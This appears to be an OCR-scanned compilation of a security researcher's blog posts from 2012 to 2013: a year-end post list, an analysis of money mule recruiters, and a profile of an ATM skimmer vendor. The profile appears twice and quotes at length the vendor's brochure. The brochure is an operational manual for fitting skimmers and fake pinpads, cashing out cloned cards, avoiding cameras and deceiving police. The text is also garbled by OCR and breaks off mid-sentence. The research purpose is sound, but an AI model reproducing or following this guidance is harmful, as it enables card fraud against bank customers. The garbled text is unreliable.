Over the years, you’ve been exposed to insightful, in-depth, "God Eye’s View" of some 
of the most prolific, targeted, and trending cyber attacks/cybercriminal schemes, that shaped 
the way we fight and anticipate cybercrime campaigns throughout the years. 


Although the production of such publicly available and socially oriented content at this 
blog will continue, it’s time to raise the stakes even higher - in 2013, I'll be systematically 
making available commercially available CYBERINT assessments on multiple aspects of the 
cybercrime ecosystem. It’s the stuff that will help your decision-making process, it’s the data 
to help you prosecute those behind these fraudulent operations, it’s the tactics and trends 
you don’t get to read about anywhere online. 


Please, take 1 second of your precious time, and participate in the voting poll on the 
right side of the blog. 


Enjoy the holidays, and see you all in 2013! 


This post has been reproduced from [1]Dancho Danchev’s blog. Follow him 
[2]on Twitter. 


1. http: //ddanchev. blogspot .com/ 
2. http://twitter.com/danchodanche 


8.12.3 Dancho Danchev’s Blog Most Popular Posts for 2012 (2012-12-28 00:26) 


The time has come to reflect on this year’s most popular posts, and emphasize on the key 
points about what made them special. 
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1. [1]Who’s Behind the Koobface Botnet? - An OSINT Analysis - Indisputably, the exposing 
of Koobface botnet master KrotReal is this year’s most popular blog post. The release of 
the post, and the [2]New York Times article discussing the case, immediately resulted in 
the shut down of [3]the Koobface botnet. 


2. [4]Exposing the Market for Stolen Credit Cards Data - Although the post was originally 
published in 2011, it’s the second most popular for 2012, proving that factually presenting 
the existence of a growing trend, inevitably reaches a wider audience. 


3. [5]Dissecting Operation Ababil’ - an OSINT Analysis - The OSINT analysis of ’Operation 
Ababil’ is this year’s third most popular post. The analysis correctly identified a key partic- 
ipant in certain parts of the campaign, although it explicitly emphasized on the fact just 
how easy is it to launch a [6]cyber false flag operation online. 


4. [7]Profiling a Vendor of Visa/Mastercard Plastics and Holograms - The main purpose of 
this post, was to shed more light into the increasing availability of "blank plastic" services, 
whose QA (Quality Assurance) processes sometimes outpace the OPSEC (Operational Se- 
curity) efforts put in place by the targeted companies. 


5. [8]Pricing Scheme for a DDoS Extortion Attack - This post highlighted a bold, but obtained 
from "in the wild" DDoS extortion letter, indicating the degree of flexibility and profession- 
alism applied by the cybercriminals behind it. 


6. [9]A Peek Inside the Vertex Net Loader - This post summarized the key features of the 
Vertex Net Loader, and emphasized on the systematic release of related DIY malware 
loaders/bots within the cybercrime ecosystem. 


7. [10]Dissecting the Ongoing Mass SQL Injection Attack - Regular readers of my personal 
blog are used to getting the latest threat intelligence regarding a particular widespread 
campaign, virtually in real-time. That was the main objective of this analysis, fortunately, 
successfully achieved. 


8. [11]Dissecting the Massive SQL Injection Attack Serving Scareware - An ever-green anal- 
ysis demonstrating monetization of hijacked Web traffic through a scareware affiliate pro- 
gram. 


9. [12]Koobface Botnet Master KrotReal Back in Business, Distributes Ransomware And 
Promotes BHSEO Service/Product - The second post in the series profiling ex-Koobface 
botnet master KrotReal’s cybercrime-friendly operations, also gained a lot of attention, 
and proved that the lack of prosecution in this case, can, and will, ultimately lead to more 
cybercrime-friendly activities. 


10. [13]Dissecting Operation Ababil’ - an OSINT Analysis - Part Two - With ‘Operation Ababil’ 
still an open question to many of the major media outlets, the second part of the analysis 
discussed another tool used in the campaign, with the idea to raise more awareness on 
the tools and techniques used by the attackers behind the campaign. 


Thank you all for being regular blog readers! The best is yet to come! See you all in 2013! 


This post has been reproduced from [14]Dancho Danchev’s blog. Follow him 
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[15]Jon Twitter. 
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ttp://www.nytimes.com/2012/01/17/technology/koobface-gang-that-used-facebook-to-spread-worm-operates-in- 


he-open.html?pagewanted=al 


ttps://www. google. com/#sclient=psy-abkhl=en&site=k%source=hpkq=site :ddanchev. blogspot .comt+koobface&pbx=1ko 


=site:ddanchev. blogspot .com+koobfacekag=f kaqi=kaql=kg 


. http://ddanchev. blogspot .com/2011/10/exposing-market-for-stolen-credit-cards.htm 


ttp://ddanchev.blogspot.com/2012/09/dissecting-operation-ababil-osint .htm 


. http://ddanchev. blogspot .com/2012/01/profiling-vendor-of-visamastercard. htm 
. http://ddanchev.blogspot.com/2009/11/pricing-scheme-for-ddos-extortion.htm 
. http: //ddanchev.blogspot .com/2011/05/peek-inside-vertex-net- loader. htm 


ttp://ddanchev. blogspot .com/2011/10/dissecting- ongoing-mass-sql-injection.htm 
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5 
6. http: //www.zdnet .com/blog/security/should-a-targeted-country-strike-back-at-the-cyber-attackers/6194 
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ttp://ddanchev. blogspot .com/2011/03/dissecting-massive-sql-injection-attack. html 


12. http://ddanchev. blogspot .com/2012/11/koobface-botnet-master-krotreal-back-in.htm 


ttp://ddanchev. blogspot .com/2012/10/dissecting-operation-ababil-osint.htm 


14. http://ddanchev. blogspot .com/ 
15. http://twitter .com/danchodanche 
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2013 


9.1 January 


9.1.1 Historical OSINT: OPSEC-Aware Money Mule Recruiters Hire, Host Crimeware 
and Malvertisements (2013-01-05 16:10) 


In the following intelligence brief, | will perform an analysis of the cybercriminal operations 
involving a group of individuals that operated successfully though 2009/2010, recruiting 
money mules, hosting ZeuS crimeware, and participating in a malvertising campaign. 


Compared to a previous analysis where | profiled the [l]loffensive client-side exploita- 
tion campaigns launched by money mule recruiters, in this analysis I’ll emphasize on yet 
another OPSEC-aware ([2]Operational Security) gang of cybercriminals, this time blocking 
access to Google and anti-money laundering Web sites/research, in an attempt to trick the 
newly recruited mules into thinking that they’re working for a legitimate company, preventing 
them from obtaining info on their new "employer". 


Key summary points: 


¢ The group originally launched its operations in 2009, primary focusing on highly targeted 
money mule recruitment campaigns 


¢ Only two of the malicious domains involved in the 2009/2010’s campaigns are still ac- 
tive, with the first serving adult content, and the second offering name server services to 
pharmaceutical scams, indicating they’re didn’t quite left the cybercrime ecosystem just 
yet 


¢ The cybercriminals behind the campaign impersonated the legitimate [3]Sprott Asset 
Management company, and blocked access to its official site on mule’s PCs that executed 
the malicious SSL Certificate supplied to them as a requirement for joining the fake com- 
pany 


¢ Upon execution, the bogus SSL Certificate executable modified the HOSTS file on the 
affected hosts, blocking access to [4]ddanchev.blogspot.com and to [5]bobbear.co.uk to 
prevent potential money mules from reaching my "[6]Keeping Money Mule Recruiters on 
a Short Leash" series, and bobbear’s vast archive of collected intelligence on money mule 
recruitment campaigns 
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The group hosted multiple ZeuS crimeware variants using the same infrastructure as the 
money mule recruitment campaigns, and also participated in a malvertising campaign 


Although their initial 2009 operations were launched from (AS39134), they later on mi- 
grated to a Kazakhstan-based bulletproof hosting provider (AS50793) that’s no longer in 
operation, although there’s a high probability that the Kazakhstan hosting service was 
part of a franchise, and is currently operating in another part of the world. The Web site 
of the bulletproof hosting provider was hosted in Ukraine (AS6714), an AS also known to 
have participated in numerous crimeware campaigns 


The malicious activity (besides their operation) was found for (AS39134) indicating that 
they probably got kicked out of the hosting provider for their attempts to recruit money 
mules 


The domain name of the Kazakhstan-based bulletproof hosting provider (AS50793) was 
registered using a GMail account in 2010 


The Kazakhstan-based bulletproof ISP’s domain name is currently registered to an Iranian 
citizen, two years after the malicious activities took place, with no signs of malicious 
activity currently taking place there 


This post has been reproduced from [7]Dancho Danchev’s blog. Follow him 
[8]Jon Twitter. 


http: //ddanchev. blogspot .com/2010/03/money-mule-recruitment-campaign-serving.htm 
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8. http: //twitter .com/danchodanche 
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9.1.2 Historical OSINT - Profiling an OPSEC-Unaware Vendor of GSM/USB ATM Skim- 
mers and Pinpads (2013-01-05 20:42) 


P| 
| 
iA 


in a few boars this a dl 

is what yea make ee | 

with ont of thest ‘ 
7-77-08 


On daily basis, | profile over a dozen of newly advertised (verified) vendors of ATM skimmers, 
indicating that this market segment is still quite successful, thanks to the overall demand 
for these ‘tools-of-the-trade’, allowing potential cybercriminals to enter the world of ATM 
skimming. 


In this post part of the "Historical OSINT" series, I'll profile the underground market propo- 
sition of a vendor of GSM/USB ATM Skimmers and Pinpads, that appeared on my radar 
back in 2008, with an emphasis on the lack of OPSEC (Operational Security) applied by 
them, and the IP hosting changes of their main domain that took place throughout 2008, in 
particular, offer evidence of active multi-tasking on behalf of the same gang of cybercriminals. 


What’s particularly interesting about this vendor is the fact that, instead of advertising 
across popular and well known cybercrime-friendly Web communities, they themselves 
created a community around the market proposition, and started pitching their offer across 
the public Web, a clear indication for a lack of OPSEC (Operational Security) awareness. 


On 2006-04-06, darkforum.net (ICQ 16-09-61/160961) was registered using the al- 
saleh@gawab.com email. On 2009-01-07, the registration email changed to blan- 
erds@hushmail.com. These emails are not known to have been used in previous cybercrime- 
friendly campaigns. 


Throughout 2008, the darkforum.net domain constantly changed IPs. The following is a 
complete list of the IP changes: 
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64.74.96.241 

69.64.145.229 - IP already profiled in a [1]previously published analysis 
63.251.92.197 

216.8.177.23 

69.25.142.57 

208.73.212.12 

87.242.73.96 - known [2]C &C server 

64.208.225.139 


The advertised brochure of the vendor: 

Overview of the technology involved: Here is how it all works. 

Full operating instructions are included with the entire package, this page is here for informa- 
tive purposes. The Card Reader reads ATM & credit cards and sends the data tracks through 
SMS to a phone. The pin-pad catches the pushing of the pin number through the keypad and 
also sends the data through SMS. 


SMS data comes to a programmable mobile phone number, which you will set to a safe 
number of yours. It is advised to connect your phone to a computer, and download the track 
data to your computer as it arrives. After every 2 message track+pin combo, an SMS is sent 
from each GSM device with a status update. From your computer, you can keep track of the 
whole operation. 
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The GSM Kit comes with an MSR206 device and track writing software. From your computer, 
you retrieve the track data and pin numbers from SMS messages, and then write the tracks to 
swipe cards with the cloned ATM/Credit cards, you simply use the pin to cash them out at ATM 
machines. 
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Receiving: 
Received Data on the computer is encrypted. For the decryption, there is a separate program, 
which is included on the software DVD. Decrypted data is then ready to be written on cards. 


Thus we have a secure working environment. None of your cashiers or crew can get 
the unencrypted data. Only the user of the software, who controls the operation. This kit is 
built on brand new technology. We have put a lot of time and money into the development 
and design. As a result, this is currently the most efficient method of retrieving dumps and 
pins. 


for example the first skimmers were used with a camera, and on the given moment of 
skimmer it works with the transmission of data on network GSM, with the sending SMS or 
with the subtraction of data after calling it. In this case the complete reliability of the work 
of equipment, checked by time and experience of many people. For example now we use 
the multilayer printed-circuit boards, similar, as are used in the laptop computers or mob 
telephones, with the silver contacts and the working from the oxidation although previously 
they were altogether only old boards. Now for the size decrease is necessary to proceed with 
decent expenditures in order to decrease the sizes and in this case to increase reliability. 


Our skimmers were actually originally developed for personal use, not for sale. They 


were designed with the most robust, smallest and most efficient parts at each stage of the 
building process. 


___1C9.16-09-6 
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Why small? Well, it is better to have a small unit, that fits discretely onto the ATM machine. 
Why GSM? Because it is possible to receive SMS at from a remote location. Nobody has ever 
been caught by police with a GSM skimmer, to the best of our knowledge. Each day our team 
is working on the development of newer and newer technologies. From time to time we apply 
our improvements to our range of products. Thus we from time to time change to new designs 
of housings; we improve the capability of batteries, or the switching system. For example, the 
new version of our software has some improvements over previous versions and is regularly 
updated. Usually clients send on their feature requests and we are frequently building them 
into our newest kits. 


Our skimmers can read a change in the rate of card conduction. For example, if we in- 
sert the card slowly, and then accelerate it, our magnetic strip reader will read and correct 
this. We read both tracks info from both sides of the strip. We read reliably, with a 99.9 % 
correct rate of reading. Sending of SMS occurs from the internal components of two Sony 
Ericsson 850i units. The batteries, visible in some of the pictures are from Motorola phones. 
The internal circuitry of the phones is connected to a digital circuit and chip which receive 
the information from the pinpad and magnetic reader, respectfully. You will need 3 sim cards, 
pre-paid is recommended. Each reading sends 4 SMS messages, 1 with the track information, 
1 with the pin, and 1 from each unit with a status update. 


On each sim card, you will have to save the phone number of your home mobile phone’s sim 
card under the name "home". The internal circuitry and interface with the SE850i unit will 
look to this number to send both the track data and the pin numbers. 


The internal processing chip encrypts the data before sending sms to the computer. In 
the kit, the decoding program in included which with one click will transfer the crypted dump 
into plain text. On opening this program, it is necessary to enter password. But if password is 
incorrect that program will close with a system error message, rather than responding with an 
incorrect password message. This is an obvious security feature. Each unit has an individual 
serial number and password. The password is included in the full package. It is possible to 
request that the password be communicated online, rather than be included with the software 
and package. 
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| will give couple of working examples of scenarios. If someone attempts to open the program 
and types an incorrect password, an error message is displayed and the software will "crash". 
It gives the impression that the software is simply not working. But if the correct password 
is entered, then it will start. If necessary, it is possible to simple say that the software is just 
something downloaded from the Internet, but it does not work, and you forgot to remove it. 
And no specialist will be able to prove what kind of program it is. 


The exterior appearance and feel of our devices is built based on the original appear- 
ance of the ATM machine. In other words, if in one instrument incorporates smooth lines, 
and sleek curves, then our device will appear very similar on its exterior housing. It is 
virtually unnoticeable that there has been a modification to the ATM. The paint, with which 
we spray our housings is matched to the paint on the original ATMs. Our method of colouring 
accurately reproduces the originals, while maintaining all the characteristics of colouring, 
including varying temperature conditions, the angle of incidence of the paint, pressure, time 
of polymerization, etc. 


As such we attained a perfect match of paint, tone of paint, reflection, and nuances 
with the different angles of incidence of light, feeling of the surface and so forth. On the job, 
this looks and feels exactly the same as an un-modified ATM. All instruments are powered 
from Li-on batteries. A charger is included in the complete set. Each battery is sufficient for 
2-3 days of work (at a rated temperature of 22 Celsius). We have carried out extensive tests 
to find the maximum quantity of SMS which can be sent from one battery. Tests showed that 
we could send 1400 SMS from one battery without a recharge. The majority of the time, the 
instrument stands in standby mode. Very little power is used until the card is inserted or the 
pinpad is pressed, when track data is collected, and pins are collected. 


The complete set comes with everything you need to run a full operation. However, the 
batteries need to be fully charged and recharged. This means that it is necessary to give 2-3 
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complete cycles of charging and discharging. This makes possible for battery to work longer. 
As a rule by this "warming-up" of the batteries an increase of the length of time they will 
operate will increase by 30-40 %. 


Again we stress that we are moving ahead, and developing more advanced devices. The 
current range for sale has been extensively tested and proven as a reliable kit. 


USB Flash memory skimmers: 
We have a cheaper range of non-GSM skimming kit for sale. This is mostly bought by new 
users, as experienced, wealthy crews will be using the more modern GSM skimmers. 


Our range starts with a basic skimmer & hidden camera, pre installed inside a discrete 
case, with flash storage and timestamps. Our basic skimmers are just as discrete and 
physically sound as our expensive GSM kit. They contain a 512 mb flash card, and a ROM chip 
with tiny card writer to record the info to the micro sd card. These kits come with an MSR206 
and a multi card reader to retrieve the dumps + pins from both devices. 


If you already own an MSR206, it can be removed from the package and a small dis- 
count can be given. 
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Pinpad info 

Basic features of our pinpads are: 

1. Ultra thin, around 3mm and it looks slimmer because of some design tricks 
2. Real Stainless-Steel Material Frame and the keys 

3. Exact same size as the actual ATM’s pinpad 

4, Special plated Frame and Keys that does not hold any 

Fingerprints well 

5. Ultra low power consumption 

6. Various languages supported 
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Technical Information on Charging and Communicating: 

As usual, you may charge your pinpad through the USB communication cable. Charging is au- 
tomatic, when you plug the cable into the pinpad, it will start charging. You can communicate 
with the pinpad while charging. You should charge your pinpad for a minimum 2 hours before 
operation. Try to use a USB Port on a Desktop Computer instead of a Laptop or USB hub. If u 
need to use a laptop then make sure you are using laptop with its power adapter connected, 
otherwise you will try to charge pinpads Battery with laptop’s battery and this will result in 
poor charging. Remember, you have to check date and time of your pinpad and adjust it if 
needed before operation. Setting the date/time is very easy using the software provided. 


There are some limits on USB Charging. USB Charging is good if your skimming oper- 
ation last 12-16 hours. If you require your pinpad to last longer then you have to buy 
Lithium-Polymer(Li-Po) 3.7v Generic charger for charging the battery of your pinpad. We can 
include this with the full kit for an extra cost. You may contact to us if you bought a Li-Po 
charger and want to use it with your pinpad. 


You must be extremely careful when plugging the cable into the pinpad! There was not 
enough space in the pinpad for us to place a generic USB socket that eliminates user mistakes 
when plugging in the cable. We used plain socket that allows user to plug cable in any 
direction/position. If you plug the cable in the wrong direction/position then your pinpad 
electronics may be damaged. There also a risk to your battery. So pay special attention when 
plugging the cable into your pinpad for data transfer and/or charging. Check the picture below 
for concise instructions on how to plug the cable into your pinpad. 


Follow these steps for easy plugging: 
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1. Identify the Red Wire on the cable’s socket 

2. Identify the Red Wire on pinpads Socket 

3. Red wire of pinpads socket should always be near the Crystal, and should join with the 
other red wire. 

4. Then plug it like this: 


Information on Installing and Removing to/from ATM: 

You should use transparent fast glues for glue your Pinpad. You have to be very careful on 
NOT TO GLUE the Membrane of your Pinpad. You only need to glue the back of the frame of 
the Pinpad, only places where it touches the ATM. Again, no membrane or keys!!! You should 
use 2 holes designed for removing Pinpad from the ATM. You may use a small screwdriver or 
knife or similar. 


You have to be very careful when removing the pinpad from the ATM. You should not 
damage membrane of the pinpad when using screwdriver or knife to remove it. Several 
practice attempts, on a flat surface are recommended. 


You should try with very small amount of glue for your tests to see and understand how 
it sticks. Then you should decide what amount of glue will be used when you are on the job. 
Your tests are the key to your success. Test your skimmer on the ATM with no Glue/Less Glue 
etc. for experience. Never start to skimming before feeling you understand all the logic. 


Our Software Description 
To work with a skimmer, a computer is necessary of course. You need to save your dumps 
(card data tracks) there! We will provide you with software, which can completely control your 


4089 


skimmer. Using this software, you can download dumps from skimmer/input them from SMS, 
remove them from skimmer unit, etc. 


The program saves everything in crypted form. So that you don’t have to worry about 
being ripped off. No one will be able to retrieve your data without the password. The password 
is included in the complete package, or can be sent separately online for security purposes. 
Each skimmer is basically a small computer, with a processor, flash storage, the internals of 
a SE850i mobile(cellular/GSM) phone, through which it sends info, and it has an EEPROM chip 
which boots up and operates the unit. So that takes care of software and passwords. Software 
is supplied in the complete set with the equipment directly to the buyer, even if transaction is 
done through some mediator, and passwords are given only to the buyer. We make so that 
the mediator cannot obtain both the software and the passwords. 


The program does not show dumps on the screen. Also it does not preserve dumps in the open 
form. With the retention they are ciphered by a serious key. At the start of program it will 
request your password. But if password is introduced incorrect that it simply closes down and 
prints a system error on the screen. This creates the impression that the program is simply 
nonworking. And if you will not input the correct password, there’s no way to even know what 
kind of program it is. This was created so that non-critical people with an attempt at the start 
would not attempt to select password. Let’s just say suddenly, the police get the laptop, on 
which the program is installed. Naturally, they will ask you about the password. If you are 
creative, you will give them a fake password, which they enter it, and the program will simply 
shut down and writes that an error occurred. This will give the impression that the program 
is nonworking. And you can boldly tell that the "program never worked, and | just forgot to 
delete it". The dumps are stored in an encrypted file, which it is not possible to decrypt. There 
will be no evidence left on your computer, once the police do not get a hold of the password. 


The software itself is easy to use. There is no extra options or excess instructions. It is 
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self explanatory, but full instructions are included with the full kit. If you have any other 
questions we will try our best to answer them from our administration team or our software 
developers. 
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Safety: 

We are often asked questions about safety when we are working with skimmers. On this page, 
! will try to give some good safety advice for cashing out and operating a successful skimming 
operation. 


Observation: 

It is recommended to observe the target ATM, unobtrusively for 1-2 days before hand. Record 
at what times the ATM is busy, what times it is quiet, and at what time it is serviced and money 
is put into the machine, if it is a free standing unit. 


Equipment preparation: 

It is recommended to check all your equipment before the installation. Make sure that you 
have practised with some dummy ATM cards before hand and have transferred your own ATM 
card, or similar into track data, SMS, decrypt, and write to a "white card" with your MSR206 
card writer. 
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Work for the fitter/installer: 

The installer must be good with their hands. They must accurately and rapidly carry out his 
work, and quietly leave the area. Some crews will have their fitter dress up in a uniform to 
make them appear to be servicing the ATM. This is not such a good idea. Just go to the ATM 
when it is quiet. Perhaps have an assistant stand a distance away, to distract passers-by or 
other users of the ATM. The whole process can take less than 30 seconds. 


Operation of the device: 

Place, and the time of the installation should be selected beforehand. An observation point 
might be necessary. There should be somewhere to safely park your car from which to observe 
the operation of the skimmer and pinpad. If you are waiting in a car, it is not recommended 
that you have a laptop + msr + phone receiving and writing the data. If the operation is 
busted in this manner, you lose everything. However, if you are at home, you will have at least 
several hours in which to write the cards and cash them out. Your observation person should 
have enough food, water, etc to last in the car for the complete duration of the operation if 
possible. One plan that some crews use now is observation from an apartment or hotel close 
to the ATM. With this, you can cut down on the number of your crew. But be careful use fake 
identification if you can. 
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Full details of the installation are described with pictures in a series of PDF files included on 
the software and instructions DVD. The fitter/installer should put a card into the machine and 
reject it quickly when fitting. The receiver, working on the "home" computer, will receive the 
track, and confirm that it stuck on properly. 99 % of the time, it sticks no problem. This is also 
useful to find that the card is ejecting properly. 
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When removing equipment, your crew should be trained and ready. Some crews do not risk 
withdrawing equipment as the average 1-day run will net $20,000- $50,000 USD depending on 
where you are. However if you are confident about removing it, you should take it to run the 
operation again. If apprehended while removing the equipment, the remover should protest 
innocence. They should say that they saw something suspicious, and were trying to take it 
off the ATM to being to police/bank. The crew member should look and act like a respectable 
citizen. You do not need a crew of thugs for this operation. You need a well-spoken, relaxed, 
confident team. It can be done with just 2 people, but 3 is recommended. Observing the guy 
removing the kit is a good idea, and walkie-talkies are useful. If the observer sees someone 
approaching the removal guy, he should "squak" his walkie-talkie, and the remover can 
disappear quickly. 
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Cashing out the money: 

On many ATMs, there is a monitoring camera. Cameras are usually motion activated. We 
advise that you do not stay at one ATM more than 5 minutes, and do not tie up an ATM if there 
are people in the queue. Do not always cash out at an ATM belonging to one single bank, nor 
should you ever cash out your cards on the ATM that you skimmed them on. 
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Price List 


| Model | GSM 
Wincor Nixdorf €2900 €5600 
Procash 2150 


*Our Diebold are easily adapted to fit almost all Diebold machines. 
Please contact us if you have any special requests. 


The Kit includes a software dvd (with full instructions), MSR206, 
Skimmer + Pinpad, and encryption key to decode dumps which are 
encrypted on the devices. 


Many crews will have several people working on cashing out, and they work 10 cards per 
person per time, all returning the money to the controller periodically. If you are cashing out 
at night at a quiet ATM, having hoods up is a good idea to prevent the camera from seeing 
you.That’s just about everything you need to know to operate a safe, extremely lucrative ATM 
skimming business. 
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The Kit includes a software dvd (with full instructions), MSR206, Skimmer + Pinpad, and 
encryption key to decode dumps which are encrypted on the devices. Note: Only skimmed 
tracks are encrypted, pins are not encrypted. Rental Schemes are available, where we 
keep the encryption key for the 1st operation of the skimmer, and provide you with 20 un- 
encrypted dumps + pins. This rental scheme costs €1400 for USB kits, and €2200 for GSM kits. 


My initial discovery of this cybercrime-friendly market proposition, coincides with the 
publication of a related post back in 2008, for the first time ever publicly disclosing important 
details regarding the emergence of [3]ATM Skimmers with built-in GSM modules. 


Nowadays, these are everyday reality. 


This post has been reproduced from [4]Dancho Danchev’s blog. Follow him 
[5]Jon Twitter. 


. http://ddanchev. blogspot . com/2008/08/facebook-malware-campaigns-rotating. html 

. http: //www.bothunter .net/live/2011-10-15/index .html 

. http://www.zdnet.com/blog/security/scammers- introduce-atm-skimmers-with-built-in-sms-notification/2000 
. http://ddanchev. blogspot .com/ 

. http: //twitter .com/danchodanchev 
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9.1.3 Historical OSINT - Profiling an OPSEC-Unaware Vendor of GSM/USB ATM Skim- 
mers and Pinpads (2013-01-05 20:42) 
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On daily basis, | profile over a dozen of newly advertised (verified) vendors of ATM skim- 
mers, indicating that this market segment is still quite successful, thanks to the overall 
demand for these ‘tools-of-the-trade’, allowing potential cybercriminals to enter the world of 
ATM skimming. 


In this post part of the "Historical OSINT" series, I'll profile the underground market proposition 
of a vendor of GSM/USB ATM Skimmers and Pinpads, that appeared on my radar back in 2008, 
with an emphasis on the lack of OPSEC (Operational Security) applied by them, and the IP 
hosting changes of their main domain that took place throughout 2008, in particular, offer 
evidence of active multi-tasking on behalf of the same gang of cybercriminals. 


What’s particularly interesting about this vendor is the fact that, instead of advertising 
across popular and well known cybercrime-friendly Web communities, they themselves 
created a community around the market proposition, and started pitching their offer across 
the public Web, a clear indication for a lack of OPSEC (Operational Security) awareness. 
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On 2006-04-06, darkforum.net (ICQ 16-09-61/160961) was registered using the al- 
saleh@gawab.com email. On 2009-01-07, the registration email changed to blan- 
erds@hushmail.com. These emails are not known to have been used in previous cybercrime- 
friendly campaigns. 


Throughout 2008, the darkforum.net domain constantly changed IPs. The following is a 
complete list of the IP changes: 


64.74.96.241 
69.64.145.229 - IP already profiled in a [1]previously published analysis 


63.251.92.197 

216.8.177.23 

69.25.142.57 

208.73.212.12 

87.242.73.96 - known [2]C &C server 


64.208.225.139 


The advertised brochure of the vendor: 


Overview of the technology involved: Here is how it all works. 

Full operating instructions are included with the entire package, this page is here for informa- 
tive purposes. The Card Reader reads ATM & credit cards and sends the data tracks through 
SMS to a phone. The pin-pad catches the pushing of the pin number through the keypad and 
also sends the data through SMS. 


SMS data comes to a programmable mobile phone number, which you will set to a safe 
number of yours. It is advised to connect your phone to a computer, and download the track 
data to your computer as it arrives. After every 2 message track+pin combo, an SMS is sent 
from each GSM device with a status update. From your computer, you can keep track of the 
whole operation. 
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The GSM Kit comes with an MSR206 device and track writing software. From your com- 
puter, you retrieve the track data and pin numbers from SMS messages, and then write the 
tracks to swipe cards with the cloned ATM/Credit cards, you simply use the pin to cash them 
out at ATM machines. 


Receiving: 
Received Data on the computer is encrypted. For the decryption, there is a separate program, 
which is included on the software DVD. Decrypted data is then ready to be written on cards. 


Thus we have a secure working environment. None of your cashiers or crew can get 
the unencrypted data. Only the user of the software, who controls the operation. This kit is 
built on brand new technology. We have put a lot of time and money into the development 
and design. As a result, this is currently the most efficient method of retrieving dumps and 
pins. 


for example the first skimmers were used with a camera, and on the given moment of 
skimmer it works with the transmission of data on network GSM, with the sending SMS or 
with the subtraction of data after calling it. In this case the complete reliability of the work 
of equipment, checked by time and experience of many people. For example now we use 
the multilayer printed-circuit boards, similar, as are used in the laptop computers or mob 
telephones, with the silver contacts and the working from the oxidation although previously 
they were altogether only old boards. Now for the size decrease is necessary to proceed with 
decent expenditures in order to decrease the sizes and in this case to increase reliability. 
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Our skimmers were actually originally developed for personal use, not for sale. They 
were designed with the most robust, smallest and most efficient parts at each stage of the 
building process. 
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Why small? Well, it is better to have a small unit, that fits discretely onto the ATM ma- 
chine. Why GSM? Because it is possible to receive SMS at from a remote location. Nobody 
has ever been caught by police with a GSM skimmer, to the best of our knowledge. Each day 
our team is working on the development of newer and newer technologies. From time to time 
we apply our improvements to our range of products. Thus we from time to time change to 
new designs of housings; we improve the capability of batteries, or the switching system. For 
example, the new version of our software has some improvements over previous versions 
and is regularly updated. Usually clients send on their feature requests and we are frequently 
building them into our newest kits. 


Our skimmers can read a change in the rate of card conduction. For example, if we in- 
sert the card slowly, and then accelerate it, our magnetic strip reader will read and correct 
this. We read both tracks info from both sides of the strip. We read reliably, with a 99.9 % 
correct rate of reading. Sending of SMS occurs from the internal components of two Sony 
Ericsson 850i units. The batteries, visible in some of the pictures are from Motorola phones. 
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The internal circuitry of the phones is connected to a digital circuit and chip which receive 
the information from the pinpad and magnetic reader, respectfully. You will need 3 sim cards, 
pre-paid is recommended. Each reading sends 4 SMS messages, 1 with the track information, 
1 with the pin, and 1 from each unit with a status update. 


On each sim card, you will have to save the phone number of your home mobile phone’s sim 
card under the name "home". The internal circuitry and interface with the SE850i unit will 
look to this number to send both the track data and the pin numbers. 


The internal processing chip encrypts the data before sending sms to the computer. In 
the kit, the decoding program in included which with one click will transfer the crypted dump 
into plain text. On opening this program, it is necessary to enter password. But if password is 
incorrect that program will close with a system error message, rather than responding with an 
incorrect password message. This is an obvious security feature. Each unit has an individual 
serial number and password. The password is included in the full package. It is possible to 
request that the password be communicated online, rather than be included with the software 
and package. 


| will give couple of working examples of scenarios. If someone attempts to open the 
program and types an incorrect password, an error message is displayed and the software 
will "crash". It gives the impression that the software is simply not working. But if the correct 
password is entered, then it will start. If necessary, it is possible to simple say that the 
software is just something downloaded from the Internet, but it does not work, and you forgot 
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to remove it. And no specialist will be able to prove what kind of program it is. 


The exterior appearance and feel of our devices is built based on the original appear- 
ance of the ATM machine. In other words, if in one instrument incorporates smooth lines, 
and sleek curves, then our device will appear very similar on its exterior housing. It is 
virtually unnoticeable that there has been a modification to the ATM. The paint, with which 
we spray our housings is matched to the paint on the original ATMs. Our method of colouring 
accurately reproduces the originals, while maintaining all the characteristics of colouring, 
including varying temperature conditions, the angle of incidence of the paint, pressure, time 
of polymerization, etc. 


As such we attained a perfect match of paint, tone of paint, reflection, and nuances 
with the different angles of incidence of light, feeling of the surface and so forth. On the job, 
this looks and feels exactly the same as an un-modified ATM. All instruments are powered 
from Li-on batteries. A charger is included in the complete set. Each battery is sufficient for 
2-3 days of work (at a rated temperature of 22 Celsius). We have carried out extensive tests 
to find the maximum quantity of SMS which can be sent from one battery. Tests showed that 
we could send 1400 SMS from one battery without a recharge. The majority of the time, the 
instrument stands in standby mode. Very little power is used until the card is inserted or the 
pinpad is pressed, when track data is collected, and pins are collected. 


The complete set comes with everything you need to run a full operation. However, the 
batteries need to be fully charged and recharged. This means that it is necessary to give 2-3 
complete cycles of charging and discharging. This makes possible for battery to work longer. 
As a rule by this "warming-up" of the batteries an increase of the length of time they will 
operate will increase by 30-40 %. 
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Again we stress that we are moving ahead, and developing more advanced devices. The 
current range for sale has been extensively tested and proven as a reliable kit. 


USB Flash memory skimmers: 
We have a cheaper range of non-GSM skimming kit for sale. This is mostly bought by new 
users, as experienced, wealthy crews will be using the more modern GSM skimmers. 


Our range starts with a basic skimmer & hidden camera, pre installed inside a discrete 
case, with flash storage and timestamps. Our basic skimmers are just as discrete and 
physically sound as our expensive GSM kit. They contain a 512 mb flash card, and a ROM chip 
with tiny card writer to record the info to the micro sd card. These kits come with an MSR206 
and a multi card reader to retrieve the dumps + pins from both devices. 


If you already own an MSR206, it can be removed from the package and a small dis- 
count can be given. 


Pinpad info 
Basic features of our pinpads are: 
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1. Ultra thin, around 3mm and it looks slimmer because of some design tricks 
2. Real Stainless-Steel Material Frame and the keys 

3. Exact same size as the actual ATM’s pinpad 

4. Special plated Frame and Keys that does not hold any 

Fingerprints well 

5. Ultra low power consumption 

6. Various languages supported 


Technical Information on Charging and Communicating: 

As usual, you may charge your pinpad through the USB communication cable. Charging is au- 
tomatic, when you plug the cable into the pinpad, it will start charging. You can communicate 
with the pinpad while charging. You should charge your pinpad for a minimum 2 hours before 
operation. Try to use a USB Port on a Desktop Computer instead of a Laptop or USB hub. If u 
need to use a laptop then make sure you are using laptop with its power adapter connected, 
otherwise you will try to charge pinpads Battery with laptop’s battery and this will result in 
poor charging. Remember, you have to check date and time of your pinpad and adjust it if 
needed before operation. Setting the date/time is very easy using the software provided. 


There are some limits on USB Charging. USB Charging is good if your skimming oper- 
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ation last 12-16 hours. If you require your pinpad to last longer then you have to buy 
